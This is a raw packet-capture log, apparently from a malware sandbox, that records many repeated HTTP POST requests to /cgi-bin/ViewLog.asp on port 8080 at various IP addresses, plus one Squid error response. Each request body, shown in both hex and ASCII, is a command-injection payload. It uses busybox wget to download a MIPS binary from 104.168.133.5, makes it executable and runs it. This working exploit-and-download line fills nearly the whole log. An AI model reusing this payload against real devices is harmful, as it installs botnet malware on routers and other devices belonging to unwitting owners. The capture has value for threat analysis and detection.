                                              358192.168.2.143787285.122.231.1388080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:01.314507961 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              359192.168.2.146012085.122.220.78080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:01.648150921 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              360192.168.2.146011485.122.220.78080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:02.323466063 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              361192.168.2.144756431.136.74.1138080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:04.892631054 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:08.099808931 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:14.243585110 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:26.275046110 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:51.874020100 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              362192.168.2.144953685.208.122.1608080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:05.117058039 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:05.345669985 CET1340INHTTP/1.0 400 Bad Request
                                              Server: squid/3.1.23
                                              Mime-Version: 1.0
                                              Date: Thu, 23 Nov 2023 03:49:26 GMT
                                              Content-Type: text/html
                                              Content-Length: 3167
                                              X-Squid-Error: ERR_INVALID_URL 0
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              363192.168.2.143368294.65.33.2518080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:05.294163942 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              364192.168.2.145207094.120.12.38080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:05.299316883 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              365192.168.2.143669831.136.116.1998080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:05.883558989 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:09.123754025 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:15.267504930 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:27.298995018 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:51.874011040 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              366192.168.2.143505831.44.130.788080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:05.929405928 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              367192.168.2.144999031.136.18.638080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:06.067111015 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:06.627963066 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:07.747910976 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:10.147711992 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
